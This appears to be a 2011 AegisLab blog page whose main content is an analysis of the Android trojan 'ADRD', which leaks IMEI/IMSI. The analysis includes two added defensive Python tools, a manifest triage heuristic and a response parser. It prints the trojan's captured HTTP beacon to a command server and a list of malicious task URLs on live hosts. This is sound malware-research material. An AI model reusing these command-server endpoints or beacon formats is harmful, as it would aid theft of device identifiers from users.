[ General ] 17 February, 2011 15:56

We are located in the Lionic booth (#2732); thanks to all the visitors who stopped by our booth and gave us valuable feedback. Tomorrow will be the last day of the RSA 2011 Conference Expo, and we are also running out of materials, so please seize the chance to visit our booth and watch our demo on a real Android phone and tablet.

This is our first time setting up a booth at the RSA Expo; everything is interesting and people are energetic. It's really good for people who care about security!


[ Security Alert ] 14 February, 2011 20:38

AegisLab is devoted to protecting the security of mobile users; we have been collecting and analyzing Android packages for two years. Today we found a new Android trojan, which we call "ADRD", that had not been reported by any security vendor before.

In our analysis, the malware writer repackaged (infected) legitimate apps, especially wallpaper apps, which do not usually appear on the apps panel, so users rarely notice them. This trojan compromises personal data such as the IMEI/IMSI of the device, sends it to the remote side, and then acts on the commands received from there. The infected applications request extensive permissions such as RECEIVE_BOOT_COMPLETED and ACCESS_NETWORK_STATE so that they can run in the background once the corresponding event occurs. The trojan also schedules an alarm to wake itself up regularly. However, it keeps a somewhat lower profile than the 'GEINIMI' trojan found last year: fewer messages/commands are sent and less bandwidth is consumed. Users may not notice it even after weeks, but still suffer data leakage and bandwidth consumption.
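The traits listed above (boot and connectivity receivers, the named permissions, a wallpaper entry point, a background service) are all visible in an APK's manifest before the app is ever run, so they make a cheap first-pass triage. The following is an added example written for this page, not AegisLab's detection logic and not code from the ADRD sample: it parses an AndroidManifest.xml with the standard library and reports which of those traits are present. The two sample manifests are constructed for illustration; READ_PHONE_STATE is included on the assumption that reading the IMEI/IMSI requires it, which the post does not state. Legitimate apps use the same features, so a hit here is a reason to inspect the code, not a verdict.

```python
"""Static manifest triage for the ADRD-style trait combination.

Added example (not AegisLab's tool). Flags manifests that combine a
receiver for BOOT_COMPLETED / CONNECTIVITY_CHANGE (the wake-up triggers
named in the post) with the permissions needed to go online and read the
device identity. READ_PHONE_STATE is an assumption: the post only says
IMEI/IMSI are collected.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

SUSPICIOUS_ACTIONS = {
    "android.intent.action.BOOT_COMPLETED",
    "android.net.conn.CONNECTIVITY_CHANGE",
}
SUSPICIOUS_PERMS = {
    "android.permission.RECEIVE_BOOT_COMPLETED",  # named in the post
    "android.permission.ACCESS_NETWORK_STATE",    # named in the post
    "android.permission.INTERNET",                # needed to reach the server
    "android.permission.READ_PHONE_STATE",        # assumed: needed for IMEI/IMSI
}
# Live wallpapers expose themselves through this service action.
WALLPAPER_ACTION = "android.service.wallpaper.WallpaperService"

# Constructed sample: a wallpaper app that also registers boot and
# connectivity receivers and asks for network plus phone-identity access.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.wallpaper.sample">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <application android:label="Sample Wallpaper">
    <service android:name=".Wallpaper" android:permission="android.permission.BIND_WALLPAPER">
      <intent-filter><action android:name="android.service.wallpaper.WallpaperService"/></intent-filter>
    </service>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
        <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
      </intent-filter>
    </receiver>
    <service android:name=".BgService"/>
  </application>
</manifest>"""

# Constructed sample: a plain wallpaper with no wake-up trigger.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.wallpaper.plain">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Plain Wallpaper">
    <service android:name=".Wallpaper" android:permission="android.permission.BIND_WALLPAPER">
      <intent-filter><action android:name="android.service.wallpaper.WallpaperService"/></intent-filter>
    </service>
  </application>
</manifest>"""


def manifest_findings(manifest_xml: str) -> dict:
    """Return the traits found; callers decide how to weigh them."""
    root = ET.fromstring(manifest_xml)
    perms = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}
    # Only actions declared inside <receiver> count as wake-up triggers.
    receiver_actions = {
        a.get(ANDROID_NS + "name")
        for r in root.iter("receiver")
        for a in r.iter("action")
    }
    all_actions = {a.get(ANDROID_NS + "name") for a in root.iter("action")}
    return {
        "permissions": sorted(perms & SUSPICIOUS_PERMS),
        "receiver_actions": sorted(receiver_actions & SUSPICIOUS_ACTIONS),
        "wallpaper": WALLPAPER_ACTION in all_actions,
    }


def is_suspicious(manifest_xml: str) -> bool:
    """Heuristic: a background wake-up trigger plus network plus identity."""
    f = manifest_findings(manifest_xml)
    perms = set(f["permissions"])
    return (
        bool(f["receiver_actions"])
        and "android.permission.INTERNET" in perms
        and "android.permission.READ_PHONE_STATE" in perms
    )


if __name__ == "__main__":
    for label, xml in (("sample", SAMPLE_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(label, is_suspicious(xml), manifest_findings(xml))
```

The wallpaper flag is reported but deliberately not part of the verdict: it tells the analyst which hits match the distribution pattern described in the post, while the verdict itself rests on the trigger-plus-network-plus-identity combination that the trojan needs to operate.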


How it works:

It registers several receivers to intercept events such as boot completed and network connectivity change, then starts a service in the background once such an event occurs. The service first connects back to the server over HTTP with a DES-encrypted, hex-encoded string like:

POST /index.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a5471587b5db8848de8d7a2efc443455fa0839828c592920ddc1ec6ea1b3acf2b97d46 HTTP/1.1
HOST: adrd.taxuan.net

After decoding, we have:

354059xxxxxxxxx&310260xxxxxxxxx&1&6&adrd.zt.cw.4


It sends back the IMEI/IMSI of the phone together with some version numbers of the trojan, so that the server can decide the next step. Later the server responds with a list of URLs:

POST /pic.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a54715a7786e2a0e5e894e HTTP/1.1
RESPONSE (decoded; shown one '$'-separated record per line):
B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#961a_w1|http://59.173.12.105/g/g.ashx?w=961a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#964a_w1|http://59.173.12.105/g/g.ashx?w=964a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#881d_w1|http://59.173.12.105/g/g.ashx?w=881d_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#978a_w1|http://59.173.12.105/g/g.ashx?w=978a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#979a_w1|http://59.173.12.105/g/g.ashx?w=979a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#609b_w1|http://59.173.12.105/g/g.ashx?w=609b_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1044a_w1|http://59.173.12.105/g/g.ashx?w=1044a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#999a_w1|http://59.173.12.105/g/g.ashx?w=999a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#999b_w1|http://59.173.12.105/g/g.ashx?w=999b_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#999c_w1|http://59.173.12.105/g/g.ashx?w=999c_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1059a_w1|http://59.173.12.105/g/g.ashx?w=1059a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1060a_w1|http://59.173.12.105/g/g.ashx?w=1060a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1059b_w1|http://59.173.12.105/g/g.ashx?w=1059b_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1086d_w1|http://59.173.12.105/g/g.ashx?w=1086d_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1086e_w1|http://59.173.12.105/g/g.ashx?w=1086e_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1086f_w1|http://59.173.12.105/g/g.ashx?w=1086f_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1086g_w1|http://59.173.12.105/g/g.ashx?w=1086g_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1086h_w1|http://59.173.12.105/g/g.ashx?w=1086h_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1086r_w1|http://59.173.12.105/g/g.ashx?w=1086r_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1086t_w1|http://59.173.12.105/g/g.ashx?w=1086t_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1089b_w1|http://g.gxsmy.com/?w=1089b_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1089c_w1|http://g.gxsmy.com/?w=1089c_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#1089d_w1|http://g.gxsmy.com/?w=1089d_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#962a_w1|http://59.173.12.105/g/g.ashx?w=962a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#768b_w1|http://59.173.12.105/g/g.ashx?w=768b_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#965a_w1|http://59.173.12.105/g/g.ashx?w=965a_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#780b_w1|http://59.173.12.105/g/g.ashx?w=780b_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#834b_w1|http://59.173.12.105/g/g.ashx?w=834b_w1|1|http://59.173.12.105/add/pk.aspx$
B#1#959a_w1|http://59.173.12.105/g/g.ashx?w=959a_w1|1|http://59.173.12.105/add/pk.aspx$
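For an analyst, the useful output of a response like the one above is the set of hosts and task identifiers it contains, so they can be turned into block lists and network alerts. The following parser is an added example written for this page, not code from the AegisLab post or from the trojan: it splits the decoded response on '$', then each record on '|' and '#', and collects the distinct hosts. The record layout (kind, version, task id, target URL, count, report URL) is inferred from the delimiters visible on the page; the field names and the meaning of the numeric field are assumptions. The sample input is three records copied from the response above, plus one '%3Cbr%20/%3E' fragment of the kind the blog's HTML rendering injected, to show that junk between records is tolerated.

```python
"""Parser for the decoded ADRD command response.

Added example, not code from the post. Only the delimiters ('$', '|', '#')
and the sample records come from the page; the field names are assumed.
"""
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample: three records from the decoded response on the page,
# with an HTML '<br />' fragment (URL-encoded) inserted between two of them.
SAMPLE_RESPONSE = (
    "B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1|1|http://59.173.12.105/add/pk.aspx$"
    "%3Cbr%20/%3EB#1#1089b_w1|http://g.gxsmy.com/?w=1089b_w1|1|http://59.173.12.105/add/pk.aspx$"
    "B#1#959a_w1|http://59.173.12.105/g/g.ashx?w=959a_w1|1|http://59.173.12.105/add/pk.aspx$"
)


@dataclass(frozen=True)
class Task:
    kind: str        # first '#' field, 'B' in every record on the page
    version: str     # second '#' field, '1' in every record on the page
    task_id: str     # e.g. '963a_w1'; also appears as the w= query value
    target_url: str  # URL the device is told to fetch in the background
    count: int       # third '|' field (assumed: how many times to fetch)
    report_url: str  # fourth '|' field (assumed: where results are reported)


def parse_response(text: str) -> list[Task]:
    """Split a decoded response into Task records, skipping anything malformed."""
    tasks = []
    for raw in text.split("$"):
        # Drop the '<br />' fragments that an HTML rendering may have injected.
        rec = raw.replace("%3Cbr%20/%3E", "").strip()
        if not rec:
            continue
        fields = rec.split("|")
        if len(fields) != 4:
            continue  # not a B#1#id|url|n|url record: ignore rather than crash
        head, target_url, count, report_url = fields
        head_parts = head.split("#")
        if len(head_parts) != 3 or not count.isdigit():
            continue
        kind, version, task_id = head_parts
        tasks.append(Task(kind, version, task_id, target_url, int(count), report_url))
    return tasks


def indicator_hosts(tasks: list[Task]) -> set[str]:
    """Distinct hosts from every URL in the task list: the block-list material."""
    hosts = set()
    for t in tasks:
        for url in (t.target_url, t.report_url):
            host = urlsplit(url).hostname
            if host:
                hosts.add(host)
    return hosts


if __name__ == "__main__":
    parsed = parse_response(SAMPLE_RESPONSE)
    for t in parsed:
        print(t.task_id, "->", t.target_url)
    print("hosts:", sorted(indicator_hosts(parsed)))
```

Malformed records are skipped rather than raising, because a server can change its format at any time and a parser that dies on the first odd record gives the analyst nothing; the hosts set is what feeds proxy or DNS block rules.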


After a few HTTP requests back and forth, it gets a URL to connect to in the background (in the case we analyzed): http://wap.baidu.com/s?word=%e7%83%a8%e4%b9%8b%e5%9b%bd%e5%ba%a6&vit=uni&from=961a_w1

The malware writer may profit from the random links the infected devices connect to, while users suffer data disclosure as well as bandwidth consumption (a higher network bill).

We suggest users:

    (1) Do not download and install applications from unknown/unofficial web sites; only download from trusted sources.
    (2) Remember to install mobile security applications such as "AegisLab Antivirus Free" (originally called AppScan Beta) or "AegisLab Antivirus Elite" and scan regularly. This trojan can be identified by these tools.

By AegisLab

[ Product News ] 10 February, 2011 12:46

Today we updated the detection rate comparison table: the number of solutions has been extended to 9 and the number of samples to 70.
Tested solutions include:

1. AegisLab: EgisMobile Anti-virus Security, Version 0.4.2
2. NetQin Mobile Inc.: Mobile Anti-virus, Version 4.6
3. Lookout, Inc.: Lookout Mobile Security, Version 5.3
4. 360Safe: 360 Mobile Safe, Version 1.7.2
5. Doctor Web, Ltd.: Dr. Web for Android Light, Version 6.00.5
6. NortonMobile: Norton Mobile Security (Beta), Version 1.5.0.154
7. Trend Micro: Mobile Security, Version 1.2
8. DroidSecurity - AVG: Antivirus Free - AVG, Version 2.6
9. HAURI, Inc.: ViRobot Mobile, Version 1.5.0.911

    The final test summary is:

For those interested in the test methodology and the test samples used, please check our report (Android_Antivirus_Benchmark_2011_02_09.pdf).

Besides this internal test, we welcome public tests held by any fair entity.

By Aegislab